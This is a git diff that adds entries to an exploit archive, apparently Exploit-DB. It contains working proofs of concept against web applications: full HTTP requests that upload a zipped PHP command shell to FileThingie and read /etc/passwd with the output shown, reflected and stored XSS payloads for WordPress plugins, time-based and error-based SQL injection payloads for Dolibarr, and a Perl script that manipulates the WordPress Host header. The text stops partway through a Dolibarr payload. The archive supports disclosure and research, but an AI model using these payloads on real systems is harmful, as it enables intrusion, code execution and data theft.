+02-08-2019 - Vendor contacted
+02-08-2019 - Vendor responded
+02-08-2019 - Detailed report shared
+02-18-2019 - Contacted vendor on fixation status without any response 
+08-26-2019 - Full disclosure timeline given without any response
+09-01-2019 - Full Disclosure
\ No newline at end of file
diff --git a/exploits/php/webapps/47343.txt b/exploits/php/webapps/47343.txt
new file mode 100644
index 000000000..9e9ef60bb
--- /dev/null
+++ b/exploits/php/webapps/47343.txt
@@ -0,0 +1,61 @@
+# Exploit Title : CraftCms Users information disclosure From uploaded File
+# Author [Discovered By] : Mohammed Abdul Raheem
+# Author's [Company Name] : TrekShield IT Solution
+# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
+# Found Vulnerability On : 20-07-2019
+# Vendor Homepage:https://craftcms.com/
+# Software Information Link: https://github.com/craftcms/demo
+# Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCmsv3 before 3.2.6
+# Tested On : Windows and Linux
+# Category : WebApps
+# Exploit Risk : Medium
+# Vulnerability Type : Sensitive information disclosure
+# CVE : CVE-2019-14280
+####################################################################
+
+# Description about Software :
+***************************
+Craft is a flexible, user-friendly CMS for creating custom digital
+experiences on the web and beyond.
+
+####################################################################
+
+# Vulnerability Description :
+*****************************
+
+When a user uploads an image in CraftCMS, the uploaded image's EXIF
+Geolocation Data does not gets stripped. As a result, anyone can get
+sensitive information of CraftCMS's users like their Geolocation,
+their Device information like Device Name, Version, Software &
+Software version used etc.
+
+# Impact :
+***********
+
+This vulnerability is CRITICAL and impacts all the craft's customer
+base. This vulnerability violates the privacy of a User and shares
+sensitive information of the user who uploads an image on CraftCMS.
+
+# Steps To Validate :
+*********************
+
+1. Login to CraftCMS account.
+2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets
+3. Upload an image which has EXIF Geolocation Data in it.
+4. Once the image is uploaded by CraftCMS and hosted on the server,
+download the image file and check the File Properties. You can also
+use a tool like to view user's information: https://www.pic2map.com
+
+# ATTACHED POC :
+****************
+
+https://youtu.be/s-fTdu8R3bU
+
+# More Information Can be find here :
+*************************************
+
+https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23
+
+###################################################################
+
+# Discovered By Mohammed Abdul Raheem from TrekShield.com
\ No newline at end of file
diff --git a/exploits/php/webapps/47349.txt b/exploits/php/webapps/47349.txt
new file mode 100644
index 000000000..c55f35a39
--- /dev/null
+++ b/exploits/php/webapps/47349.txt
@@ -0,0 +1,153 @@
+# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload
+# Author: Cakes
+# Discovery Date: 2019-09-03
+# Vendor Homepage: www.solitude.dk/filethingie
+# Software Link: https://github.com/leefish/filethingie/archive/master.zip
+# Tested Version: 2.5.7
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Intro:
+# Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives
+
+::::: POST .zip file with cmd shell
+
+POST /filethingy/ft2.php HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
+Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034
+Content-Length: 1117
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="localfile-1567531192592"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2000000
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip"
+Content-Type: application/zip
+
+PK   š#O        $      cmdshell.phpUT
+ ۟n]۟n]۟n]ux 
        ³±/È(P(ÎHÍɉO­HMÖP‰ww
+‰VOÎMQÕ´VP°·ã PKý(tÅ&   $   PK
   š#Oý(tÅ&   $              ¤    cmdshell.phpUT
+ ۟n]۟n]۟n]ux 
        PK    
 
 Z   €     
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="act"
+
+upload
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="dir"
+
+/tester
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------3402520321248020588131184034--
+
+
+
+
+
+:::::::::::::::::::::::::::::Unzip  Malicious file
+
+POST /filethingy/ft2.php HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 63
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip
+
+
+
+::::::::::::::::::::::::::::::Access your shell
+
+GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Cache-Control: max-age=0
+
+
+::::::::::::::::::::::::::::::Read /etc/passwd
+
+GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+HTTP/1.1 200 OK
+Date: Tue, 03 Sep 2019 17:38:04 GMT
+Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
+X-Powered-By: PHP/5.4.16
+Content-Length: 1738
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+misdn:x:31:31:Modular ISDN:/:/sbin/nologin
+systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
+polkitd:x:999:998:User for polkitd:/:/sbin/nologin
+cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin
+mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
+saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin
+mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin
+tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
+dhcpd:x:177:177:DHCP server:/:/sbin/nologin
+asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash
+spamfilter:x:1000:1000::/home/spamfilter:/bin/bash
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
+avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
+chrony:x:996:993::/var/lib/chrony:/sbin/nologin
+cakes:x:1001:1001:cakes:/home/cakes:/bin/bash
\ No newline at end of file
diff --git a/exploits/php/webapps/47350.txt b/exploits/php/webapps/47350.txt
new file mode 100644
index 000000000..b8a90333b
--- /dev/null
+++ b/exploits/php/webapps/47350.txt
@@ -0,0 +1,47 @@
+* Exploit Title: WordPress Download Manager Cross-site Scripting
+* Discovery Date: 2019-04-13
+* Exploit Author: ThuraMoeMyint
+* Author Link: https://twitter.com/mgthuramoemyint
+* Vendor Homepage: https://www.wpdownloadmanager.com
+* Software Link: https://wordpress.org/plugins/download-manager
+* Version: 2.9.93
+* Category: WebApps, WordPress
+CVE:CVE-2019-15889
+Description
+--
+
+In the pro features of the WordPress download manager plugin, there is
+a Category Short-code feature witch can use to sort categories with
+order by a function which will be used as ?orderby=title,publish_date
+.
+By adding parameter "> and add any XSS payload , the xss payload will execute.
+
+To reproduce,
+
+1.Go to the link where we can find ?orderby
+2.Add parameters >” and give simple payload like <script>alert(1)</script>
+3.The payload will execute.
+--
+
+PoC
+--
+
+ <div class="btn-group btn-group-sm pull-right"><button type="button"
+class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a
+class="btn btn-primary"
+href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
+class="btn btn-primary"
+href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
+
+--
+Demo
+--
+https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
+--
+
+
+Another reflected cross-site scripting via advance search
+
+https://server/wpdmpro/advanced-search/
+
+https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
\ No newline at end of file
diff --git a/exploits/php/webapps/47356.txt b/exploits/php/webapps/47356.txt
new file mode 100644
index 000000000..1592089ec
--- /dev/null
+++ b/exploits/php/webapps/47356.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Inventory Webapp SQL injection
+# Data: 05.09.2019
+# Exploit Author: mohammad zaheri
+# Vendor HomagePage: https://github.com/edlangley/inventory-webapp
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+/php/add-item.php
+
+
+==========
+Vulnerable Source:
+==========
+Line39: $name = $_GET["name"];
+Line39: $description = $_GET["description"];
+Line39: $quantity = $_GET["quantity"];
+Line39: $cat_id = $_GET["cat_id"];
+Line49: if(mysql_query($itemquery, $conn))
+
+
+
+=========
+POC:
+=========
+http://site.com/php/add-item.php?itemquery=[SQL]
+
+
+
+=========
+Contact Me :
+=========
+Telegram : @m_zhrii
+Email : neoboy503@gmail.com
\ No newline at end of file
diff --git a/exploits/php/webapps/47361.pl b/exploits/php/webapps/47361.pl
new file mode 100755
index 000000000..cd46f1626
--- /dev/null
+++ b/exploits/php/webapps/47361.pl
@@ -0,0 +1,91 @@
+#!/usr/bin/perl -w
+#
+#  Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#  Type: Remote
+#  Risk: High
+#
+#  Solution:
+#  Set security headers to web server and no-cache for Cache-Control
+#  
+#  Simple Attack Scenarios:
+#  
+#     o  This attack can bypass Simple WAF to access restricted content on the web server,
+#        something like phpMyAdmin;
+#
+#     o  This attack can deface the vulnerable Wordpress website with content from the default vhost;
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#       # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+#	# ====================================================================================
+#	# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
+#	# >  Host => default-vhost.com
+#	# >  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+#	# >  Content-Type => application/x-www-form-urlencoded
+#	# <  Connection => close
+#	# <  Date => Fri, 06 Sep 2019 11:39:43 GMT
+#	# <  Location => https://default-vhost.com/
+#	# <  Server => nginx
+#	# <  Content-Type => text/html; charset=UTF-8
+#	# <  Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
+#	# <  Client-Peer => 13.37.13.37:443
+#	# <  Client-Response-Num => 1
+#	# <  Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
+#	# <  Client-SSL-Cert-Subject => /CN=default-vhost.com
+#	# <  Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
+#	# <  Client-SSL-Socket-Class => IO::Socket::SSL
+#	# <  Client-SSL-Warning => Peer certificate not verified
+#	# <  Client-Transfer-Encoding => chunked
+#	# <  Strict-Transport-Security => max-age=31536000;
+#	# <  X-Powered-By => PHP/7.3.9
+#	# <  X-Redirect-By => WordPress
+#	# ====================================================================================
+#
+#
+# 
+use strict;
+use v5.10;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+
+
+my $host = shift || '';
+my $attacker = shift || 'default-vhost.com';
+
+
+say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+# ====================================================================================
+# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
+if ($host !~ m/^http/){
+say  "# e.g. perl $0 https://target:port/ default-vhost.com";
+exit;
+}
+
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(
+                                        protocols_allowed => ['http', 'https'],
+                                        ssl_opts => { verify_hostname => 0 }
+                                );
+   $browser->timeout(10);
+   $browser->agent($user_agent);
+
+my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
+$request->header("Host" => $attacker);
+my $response = $browser->request($request);
+say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
+say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
+say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
+say "# ====================================================================================";
\ No newline at end of file
diff --git a/exploits/php/webapps/47362.txt b/exploits/php/webapps/47362.txt
new file mode 100644
index 000000000..011722ea0
--- /dev/null
+++ b/exploits/php/webapps/47362.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+
+elemid (POST) - Sql injection PoC
+
+
+POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 143
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]
+
+
+
+Parameter: elemid (POST)
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (EXTRACTVALUE)
+    Payload:
+token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
+AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
+(ELT(7549=7549,1))),0x7176787a71))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
+AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)
\ No newline at end of file
diff --git a/exploits/php/webapps/47366.txt b/exploits/php/webapps/47366.txt
new file mode 100644
index 000000000..e6140d346
--- /dev/null
+++ b/exploits/php/webapps/47366.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Online Appointment SQL Injection 
+# Data: 07.09.2019
+# Exploit Author: mohammad zaheri
+# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+Online-Appointment-Booking-System-master/signup.php
+
+
+==========
+Vulnerable Source:
+==========
+Line 52: $name=$_POST['fname'];
+Line 53: $gender=$_POST['gender'];
+Line 54: $dob=$_POST['dob']; 
+Line 55: $contact=$_POST['contact'];
+Line 56: $email=$_POST['email'];
+Line 57: $username=$_POST['username'];
+Line 58: $password=$_POST['pwd'];
+Line 59: $prepeat=$_POST['pwdr'];
+Line 62: if (mysqli_query($conn, $sql)) 
+
+=========
+POC:
+=========
+http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL]
+
+
+
+=========
+Contact Me :
+=========
+Telegram : @m_zhrii
+Email : neoboy503@gmail.com
\ No newline at end of file
diff --git a/exploits/php/webapps/47369.txt b/exploits/php/webapps/47369.txt
new file mode 100644
index 000000000..e7a022f17
--- /dev/null
+++ b/exploits/php/webapps/47369.txt
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: September 09,2019
+# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
+# Software Link : https://wordpress.org/plugins/sell-downloads/
+# Tested Version: 1.0.86
+# Tested on: Parrot OS, Wordpress 5.1.1
+
+
+# PoC:
+1- Go to "Products for Sale" section
+2- Click on "Add New"
+3- In opend window click on "Add Comment"
+4- Fill comment as "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()">
+5- Click on "Publish" (or "Update" if you editing an existing product)
+6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up.
\ No newline at end of file
diff --git a/exploits/php/webapps/47370.txt b/exploits/php/webapps/47370.txt
new file mode 100644
index 000000000..3301791df
--- /dev/null
+++ b/exploits/php/webapps/47370.txt
@@ -0,0 +1,140 @@
+# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+
+actioncode (POST) - Sql injection PoC
+
+http request:
+
+POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 610
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+
+
+Parameter: actioncode (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE
+0x28 END))--
+HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT
+(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
+XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)--
+jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+.
+.
+.
+.
+.
+
+demand_reason_id, availability_id (POST) - Sql injection PoC
+
+http request:
+
+POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 471
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+
+
+Parameter: demand_reason_id (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
+RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28
